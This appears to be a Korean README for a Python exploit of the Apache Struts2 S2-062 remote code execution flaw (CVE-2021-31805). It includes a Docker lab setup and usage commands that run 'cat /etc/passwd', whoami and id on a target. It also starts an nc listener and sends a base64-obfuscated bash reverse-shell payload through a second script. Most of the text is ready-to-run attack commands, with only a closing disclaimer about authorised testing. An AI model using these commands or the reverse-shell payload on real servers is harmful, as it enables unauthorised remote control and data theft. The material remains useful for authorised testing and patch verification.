
Python용 Apache Struts2 S2-062(CVE-2021-31805) 원격 코드 실행 익스플로잇으로, Docker 기반 재현 환경과 리버스 셸 페이로드 생성을 포함합니다.
Apache Struts2 S2-062 원격 코드 실행 취약점(CVE-2021-31805) | 리버스 셸
docker-compose.yml
version: '2'
services:
struts2:
image: vulhub/struts2:2.5.25
ports:
- "8080:8080"
이미지를 pull하여 환경 시작
docker-compose up -d
접속 주소: http://1.1.1.1:8080
python Struts2_S2-062_CVE-2021-31805.py http://1.1.1.1:8080/index.action "cat /etc/passwd"

python Struts2_S2-062_CVE-2021-31805.py http://1.1.1.1:8080/index.action whoami

python Struts2_S2-062_CVE-2021-31805.py http://1.1.1.1:8080/index.action id

nc -lvvp 8081

base64로 인코딩된 리버스 셸 스크립트를 생성하고, 다음 사이트를 이용: https://ir0ny.top/pentest/reverse-encoder-shell.html

python CVE-2021-31805_Shell.py http://1.1.1.1:8080/index.action "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvODA4MCAwPiYx}|{base64,-d}|{bash,-i}"


불법적인 용도로 사용하지 마시고, 보안 테스트 용도로만 사용하십시오. 그 외의 용도로 발생한 결과는 본 프로젝트와 무관합니다. 참고: 반드시 정식 승인을 받은 상태에서 사이트를 테스트하십시오: 무단 테스트는 불법이며, 적발 시 책임을 질 수 있습니다.